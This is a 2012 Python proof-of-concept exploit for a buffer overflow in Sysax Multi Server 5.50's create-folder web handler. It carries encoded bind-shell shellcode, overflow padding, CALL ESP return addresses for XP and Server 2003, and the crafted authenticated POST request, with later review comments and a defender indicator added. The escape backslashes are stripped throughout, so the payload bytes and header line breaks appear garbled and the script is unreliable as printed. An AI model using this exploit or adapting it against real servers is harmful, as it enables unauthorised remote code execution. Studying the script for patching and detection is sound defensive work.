
# Title : Sysax Multi Server 5.50 Create Folder BOF
# Published : 2012-01-18
# Author :


#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.50 Create Folder BOF
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Date Discovered: January 13, 2012
#Vendor Contacted: January 15, 2012
#Vendor Response: January 16, 2012
#Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
#Additional exploit details, notes and assumptions can be found here:
#http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html
##########################################################################################################

import socket,sys

# Historical (2012) proof-of-concept against the buffer overflow in the
# "create folder" web handler named in the title; the header above records
# that the vendor fixed it in 5.52. Python 2 syntax throughout (print
# statements, str-typed socket payloads).
if len(sys.argv) != 5:
    print "[+] Usage: ./filename.py <Target IP> <Port> <SID> <XP or 2K3>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
sid = sys.argv[3]
# NOTE(review): `os` shadows the stdlib module name; harmless here because
# the module is never imported, but a clearer name would be `target_os`.
os = sys.argv[4]

# The SID is an authenticated session token, so the request below only
# reaches the vulnerable handler with a valid logged-in session.
if len(sid) != 40:
    print "[X] Something is wrong with your SID, it should be 40 bytes long."
    print "[X] Refer to http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html"
    sys.exit(1)

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "x00"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shell = ("xdaxdcxd9x74x24xf4x5fx2bxc9xb8xb7x6exc5xe9" 
"xb1x56x83xc7x04x31x47x14x03x47xa3x8cx30x15" 
"x23xd9xbbxe6xb3xbax32x03x82xe8x21x47xb6x3c" 
"x21x05x3axb6x67xbexc9xbaxafxb1x7ax70x96xfc" 
"x7bxb4x16x52xbfxd6xeaxa9x93x38xd2x61xe6x39" 
"x13x9fx08x6bxccxebxbax9cx79xa9x06x9cxadxa5" 
"x36xe6xc8x7axc2x5cxd2xaax7axeax9cx52xf1xb4" 
"x3cx62xd6xa6x01x2dx53x1cxf1xacxb5x6cxfax9e" 
"xf9x23xc5x2exf4x3ax01x88xe6x48x79xeax9bx4a" 
"xbax90x47xdex5fx32x0cx78x84xc2xc1x1fx4fxc8" 
"xaex54x17xcdx31xb8x23xe9xbax3fxe4x7bxf8x1b" 
"x20x27x5bx05x71x8dx0ax3ax61x69xf3x9exe9x98" 
"xe0x99xb3xf4xc5x97x4bx05x41xafx38x37xcex1b" 
"xd7x7bx87x85x20x7bxb2x72xbex82x3cx83x96x40" 
"x68xd3x80x61x10xb8x50x8dxc5x6fx01x21xb5xcf" 
"xf1x81x65xb8x1bx0ex5axd8x23xc4xedxdexedx3c" 
"xbex88x0fxc3x51x15x99x25x3bxb5xcfxfexd3x77" 
"x34x37x44x87x1ex6bxddx1fx16x65xd9x20xa7xa3" 
"x4ax8cx0fx24x18xdex8bx55x1fxcbxbbx1cx18x9c" 
"x36x71xebx3cx46x58x9bxddxd5x07x5bxabxc5x9f" 
"x0cxfcx38xd6xd8x10x62x40xfexe8xf2xabxbax36" 
"xc7x32x43xbax73x11x53x02x7bx1dx07xdax2axcb" 
"xf1x9cx84xbdxabx76x7ax14x3bx0exb0xa7x3dx0f" 
"x9dx51xa1xbex48x24xdex0fx1dxa0xa7x6dxbdx4f" 
"x72x36xcdx05xdex1fx46xc0x8bx1dx0bxf3x66x61" 
"x32x70x82x1axc1x68xe7x1fx8dx2ex14x52x9exda" 
"x1axc1x9fxce")

# The addresses below are tied to the exact kernel32.dll builds the author
# tested (see "Tested on" in the header); anything else, or any build with
# DEP enabled, is outside what this script covers. Note also that `buf` is
# only assigned inside these two branches, so any other value of `os`
# raises NameError at the `head += buf` line further down.
#No DEP bypass :(
if os == "2K3":
     junk = "x41" * 648
     jump = "xDFxF2xE5x77"	#77E5F2DF CALL ESP kernel32.dll
     buf = junk + jump + "x90" * 10 + shell + "x44" * 1000

if os == "XP":
     junk = "x41" * 667
     jump = "xF0x69x83x7C" 	#7C8369F0 CALL ESP kernel32.dll
     buf = junk + jump + "x90" * 50 + shell + "x44" * 1000

print "================================================"
print "[*] Sysax Multi Server 5.50 Create Folder BOF"
print "[*] ------------------by cd1zz------------------"
print "[*] Launching exploit against " + target + "...."
print "================================================"

# Defender note: the request advertises "Content-Length: 171" while the
# multipart body actually carries `buf`, which is well over 1 KB (junk +
# jump + NOP sled + shell + padding). A form field `e2` of that size on the
# mk_folder2 handler, or the length mismatch itself, is a usable indicator
# in proxy/WAF logs for this pre-5.52 attack pattern.
head = "POST /scgi?sid="+sid+"&pid=mk_folder2_name1.htm HTTP/1.1rn"
head += "Host: rn"
head += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1rn"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
head += "Accept-Language: en-us,en;q=0.5rn"
head += "Accept-Encoding: gzip, deflatern"
head += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
head += "Proxy-Connection: keep-alivern"
head += "Referer: http://"+target+"/scgi?sid="+sid+"&pid=mk_folder1_name1.htmrn"
head += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231rn"
head += "Content-Length: 171rnrn"
head += "-----------------------------1190753071675116720811342231rn"
head += "Content-Disposition: form-data; name="e2"rnrn"
head += buf+"rn"
head += "-----------------------------1190753071675116720811342231--rnrn"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "rn")
    print "[*] Payload sent!"
    print "[*] Go check your shell..."
    s.recv(1024)
    s.close()
# NOTE(review): a bare except swallows every error (refused connection,
# name resolution, the NameError described above) behind one generic
# message; `except socket.error as e:` with the error printed would keep
# the failure diagnosable. The socket is also not closed on this path.
except:
    print "[X] Meh! Fail!"